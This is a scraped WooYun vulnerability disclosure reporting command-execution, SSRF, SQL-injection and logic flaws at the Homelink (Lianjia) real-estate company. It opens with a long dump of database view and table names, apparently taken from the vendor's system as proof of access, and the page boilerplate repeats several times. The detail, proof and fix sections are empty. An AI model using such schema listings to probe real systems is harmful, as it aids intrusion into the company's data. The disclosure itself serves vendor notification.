| dbo.ViewAcademyStudentByBranchs06                |
| dbo.ViewAcademyStudentByTeams00                  |
| dbo.ViewAcademyStudentByTeams01                  |
| dbo.ViewAcademyStudentByTeams02                  |
| dbo.ViewAcademyStudentByTeams03                  |
| dbo.ViewAcademyStudentByTeams04                  |
| dbo.ViewAcademyStudentByTeams05                  |
| dbo.ViewAcademyStudentByTeams06                  |
| dbo.ViewAcademyStudentByZones00                  |
| dbo.ViewAcademyStudentByZones01                  |
| dbo.ViewAcademyStudentByZones02                  |
| dbo.ViewAcademyStudentByZones03                  |
| dbo.ViewAcademyStudentByZones04                  |
| dbo.ViewAcademyStudentByZones05                  |
| dbo.ViewAcademyStudentByZones06                  |
| dbo.ViewAcademyStudentCourseMark01               |
| dbo.ViewAcademyStudentCourseMark02               |
| dbo.ViewAcademyStudentCourseMark03               |
| dbo.ViewAcademyStudentCourseMark04               |
| dbo.ViewAcademyStudentCourseMark11               |
| dbo.ViewAcademyStudentCourseMark12               |
| dbo.ViewAcademyStudentCourseMark13               |
| dbo.ViewAcademyStudentGroupByEmpCategory01       |
| dbo.ViewAcademyStudentGroupByEmpCategoryGender01 |
| dbo.ViewAcademyStudentGroupByGender01            |
| dbo.ViewAcademyStudentGroupByZone01              |
| dbo.ViewAcademyStudentNoOfClassRoom01            |
| dbo.ViewAcademyStudentNoOfClassRoom02            |
| dbo.ViewAcademyStudentNoOfClassRoom03            |
| dbo.ViewAcademyStudentNoOfClassRoom04            |
| dbo.ViewAcademyStudentNoOfDormitory01            |
| dbo.ViewAcademyStudentNoOfEMPTMStatus01          |
| dbo.ViewAcademyStudentNoOfMatrix01               |
| dbo.ViewAcademyStudentSatisfaction01             |
| dbo.ViewAcademyStudentSatisfaction02             |
| dbo.ViewAcademyStudentSatisfactionAVG01          |
| dbo.ViewAcademyStudentSatisfactionQ00            |
| dbo.ViewAcademyStudentSatisfactionQ01            |
| dbo.ViewAcademyStudentSatisfactionQ02            |
| dbo.ViewAcademyStudentSatisfactionQ03            |
| dbo.ViewAcademyStudentSatisfactionQ04            |
| dbo.ViewAcademyStudentSatisfactionQ05            |
| dbo.ViewAcademyStudentSatisfactionQ06            |
| dbo.ViewAcademyStudentSatisfactionQ07            |
| dbo.ViewAcademyStudentSatisfactionQ08            |
| dbo.ViewAcademyStudentSatisfactionQ09            |
| dbo.ViewAcademyStudentSatisfactionQ10            |
| dbo.ViewAcademyStudentSatisfactionQ11            |
| dbo.ViewAcademyStudentSatisfactionQ12            |
| dbo.ViewAcademyStudentSatisfactionQ13            |
| dbo.ViewAcademyStudentSatisfactionQ14            |
| dbo.ViewAcademyStudentSatisfactionQ15            |
| dbo.ViewAcademyStudentSatisfactionQ16            |
| dbo.ViewAcademyStudentSatisfactionQ17            |
| dbo.ViewAcademyStudentSatisfactionQ18            |
| dbo.ViewAcademyStudentSatisfactionQ19            |
| dbo.ViewAcademyStudentSatisfactionQ20            |
| dbo.ViewAcademyTeacher01                         |
| dbo.ViewAcademyTeacherPoint01                    |
| dbo.ViewBranch01                                 |
| dbo.ViewComments01                               |
| dbo.ViewComments02                               |
| dbo.ViewDivision01                               |
| dbo.ViewEmpCertificateCourseMark01               |
| dbo.ViewEruditeAuditor01                         |
| dbo.ViewEruditeDateDistinct01                    |
| dbo.ViewEruditeDateInfo01                        |
| dbo.ViewEruditeExamRoom01                        |
| dbo.ViewEruditeExamRoomAuditor01                 |
| dbo.ViewEruditeExamRoomEmpEnroll                 |
| dbo.ViewEruditeInvigilator01                     |
| dbo.ViewEruditeMark01                            |
| dbo.ViewInvoice01                                |
| dbo.ViewInvoiceMembers01                         |
| dbo.ViewNews01                                   |
| dbo.ViewNewsLike01                               |
| dbo.ViewProductCourse01                          |
| dbo.ViewProducts01                               |
| dbo.ViewReaderCourse01                           |
| dbo.ViewSABranch01                               |
| dbo.ViewSABranch02                               |
| dbo.ViewSecPrograms01                            |
| dbo.ViewSecRoleProgPrivilege01                   |
| dbo.ViewSecRoleProgPrivilege02                   |
| dbo.ViewSecSubSystems01                          |
| dbo.ViewSecSystems01                             |
| dbo.ViewSecUserProgPrivilege01                   |
| dbo.ViewSecUserProgPrivilegeByDistSystemCode     |
| dbo.ViewSecUserRole01                            |
| dbo.ViewSecUsers01                               |
| dbo.ViewSuperAgent01                             |
| dbo.ViewSuperAgentCandidate01                    |
| dbo.ViewSuperAgentScore01                        |
| dbo.ViewTCAgent01                                |
| dbo.ViewTCAgentByAreaAgentTotal01                |
| dbo.ViewTCAgentByBranchAgentTotal01              |
| dbo.ViewTCAgentByCityAgentTotal01                |
| dbo.ViewTCAgentByDivisionAgentTotal01            |
| dbo.ViewTCAgentByTeamAgentTotal01                |
| dbo.ViewTCAgentByZoneAgentTotal01                |
| dbo.ViewTCArea01                                 |
| dbo.ViewTCBranch01                               |
| dbo.ViewTCCity01                                 |
| dbo.ViewTCDivision01                             |
| dbo.ViewTCEmpQuizMark01                          |
| dbo.ViewTCEmpQuizMarkByAreaAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByAreaAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByAreaQuiz01                |
| dbo.ViewTCEmpQuizMarkByAreaQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByAreaRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByAreaUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByBranchAbsentTotal01       |
| dbo.ViewTCEmpQuizMarkByBranchAgentTotal01        |
| dbo.ViewTCEmpQuizMarkByBranchQuiz01              |
| dbo.ViewTCEmpQuizMarkByBranchQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByBranchRecordTotal01       |
| dbo.ViewTCEmpQuizMarkByBranchUnQuizTotal01       |
| dbo.ViewTCEmpQuizMarkByCityAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByCityAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByCityQuiz01                |
| dbo.ViewTCEmpQuizMarkByCityQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByCityRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByCityUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByDivisionAbsentTotal01     |
| dbo.ViewTCEmpQuizMarkByDivisionAgentTotal01      |
| dbo.ViewTCEmpQuizMarkByDivisionQuiz01            |
| dbo.ViewTCEmpQuizMarkByDivisionQuizTotal01       |
| dbo.ViewTCEmpQuizMarkByDivisionRecordTotal01     |
| dbo.ViewTCEmpQuizMarkByDivisionUnQuizTotal01     |
| dbo.ViewTCEmpQuizMarkByTeamAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByTeamAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByTeamQuiz01                |
| dbo.ViewTCEmpQuizMarkByTeamQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByTeamRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByTeamUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByZoneQuiz01                |
| dbo.ViewTCEmpQuizMarkByZoneQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByZoneRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneUnQuizTotal01         |
| dbo.ViewTCEmployee01                             |
| dbo.ViewTCEmployeeTempNoOfRecords01              |
| dbo.ViewTCQuizDateDistinct01                     |
| dbo.ViewTCTeam01                                 |
| dbo.ViewTCZone01                                 |
| dbo.ViewTeacherPrestudyLog01                     |
| dbo.ViewZTCenterArea01                           |
| dbo.ViewZTCenterRoom01                           |
| dbo.ViewZTClass01                                |
| dbo.ViewZTClass02                                |
| dbo.ViewZTClassRoom01                            |
| dbo.ViewZTStudent01                              |
| dbo.ViewZTStudent01SumByArea                     |
| dbo.ViewZTStudent01SumByAreaAbsent               |
| dbo.ViewZTStudent01SumByAreaAttend               |
| dbo.ViewZTStudent01SumByAreaLate                 |
| dbo.ViewZTStudent01SumByAreaLeave                |
| dbo.ViewZTStudent01SumByAreaMark100              |
| dbo.ViewZTStudent01SumByAreaPass                 |
| dbo.ViewZTStudent01SumByAreaTotal                |
| dbo.ViewZTStudent01SumByClassAbsent              |
| dbo.ViewZTStudent01SumByClassAttend              |
| dbo.ViewZTStudent01SumByClassLate                |
| dbo.ViewZTStudent01SumByClassLeave               |
| dbo.ViewZTStudent01SumByClassMark100             |
| dbo.ViewZTStudent01SumByClassPass                |
| dbo.ViewZTStudent01SumByClassTotal               |
| dbo.ViewZTStudentCourse01                        |
| dbo.ViewZTStudentCourseMark01                    |
| dbo.ViewZTStudentCourseMark02                    |
| dbo.ViewZTStudentCourseMark03                    |
| dbo.ViewZone01                                   |
| dbo.ZTCenter                                     |
| dbo.ZTCenterArea                                 |
| dbo.ZTCenterRoom                                 |
| dbo.ZTClass                                      |
| dbo.ZTClassRoom                                  |
| dbo.ZTStudent                                    |
| dbo.ZTStudentCourse                              |
| dbo.ZTStudentCourseMark                          |
| dbo.ZTStudentCourseMarkTemp                      |
| dbo.Zone                                         |

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-09 18:54

厂商回复：

确认，谢谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153103

漏洞标题：链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)

相关厂商：homelink.com.cn

漏洞作者： _Thorns

提交时间：2015-11-09 18:24

修复时间：2015-12-24 18:56

公开时间：2015-12-24 18:56

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153103

漏洞标题：链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)

相关厂商：homelink.com.cn

漏洞作者： _Thorns

提交时间：2015-11-09 18:24

修复时间：2015-12-24 18:56

公开时间：2015-12-24 18:56

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153103"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：